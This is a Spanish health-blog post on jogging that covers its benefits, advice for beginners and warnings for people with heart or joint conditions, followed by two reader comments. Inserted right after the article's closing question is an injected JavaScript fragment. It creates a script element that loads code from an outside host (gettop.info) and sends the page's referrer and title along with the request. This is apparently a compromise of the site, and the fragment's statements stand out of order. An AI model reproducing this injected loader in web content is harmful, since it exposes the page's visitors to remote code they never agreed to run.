Salud y belleza » Salud, ejercicios

El footing está de moda

2 Comentarios

El footing es en realidad la actividad más antigua del mundo: correr. Es, además, barato y beneficioso para la salud. En los últimos años esta actividad se ha puesto de moda y cada vez se ve a más gente practicándola por la calle. Hasta los que imaginas que son menos deportistas se apuntan. Correr a primera hora de la mañana o al anochecer es lo que más le gusta a estos singulares deportistas porque se evitan las horas de más calor y apenas hay gente por la calle. Cada año, además, se ve como más gente se apunta a los maratones que se realizan en las ciudades. Cualquier excusa vale para correr. Hasta los famosos se han apuntado a esta moda de correr por aceras y parques al aire libre. Los gimnasios se pasaron de moda para esta actividad.

footing-moda

El footing tiene numerosos beneficios: fortalece y tonifica las piernas, previene enfermedades, combate el sobrepeso, mejora la frecuencia cardiovascular proporcionando más resistencia… y también ayuda al bienestar mental porque se producen más endorfinas y esto hace que estés de mejor humor.

Además, correr es una actividad adictiva. Se trata de una cuestión de superación, de alcanzar metas. A pesar de ello, el footing tiene numerosos desertores. Muchas personas intentan empezar a correr, van al parque, por ejemplo, y a los 10 minutos vuelven a casa desanimados.

Por ello los profesionales y expertos aconsejan proponerse objetivos fáciles de cumplir e irlos superando hasta alcanzar la meta de cada uno: perder peso, preparar una maratón, tonificarse… Pero ¡cuidado principiantes! Hay que estirar muy bien y no forzarse porque pueden provocarse lesiones, además de otros problemas musculares.

Además, esta actividad no es aconsejable para todo el mundo. Es mejor que no la practiquen las personas que tengan alguna cardiopatía o lesiones articulares.

Para evitar que correr nos produzca cualquier problema lo mejor es determinar unos objetivos razonables y hacerse un programa claro. El calzado también es muy importante, al igual que escoger ropa transpirable y correr por lugares con el terreno que minimice el impacto, como césped o tierra.

Así que si quieres formar parte de esta nueva moda saludable anímate y empieza.

¿Sueles hacer footing? ¿Quieres empezar ahora?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

2 Comments »

  • susan said:

    Yo hago footing un par de veces por semana. Normalmente por la tarde-noche. No se quién tiene ánimo de despertarse temprano. La verdad es que me despeja y me duermo tranquila :) además he perdido ya 10 kilos en 10 meses. Estoy super contenta y me siento mejor de salud y resistencia

  • J.F.L said:

    Todo lo que es saludable, que se ponga de moda, ojala que se ponga de moda hacer ejercicio, no solo dietas absurdas..
    En la tele no nos enseñan eso , interesa solo engancharnos a cosas nada saludables ni sanas, ni para el cuerpo ni para la mente..

    vamos todas a por el footinggg

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.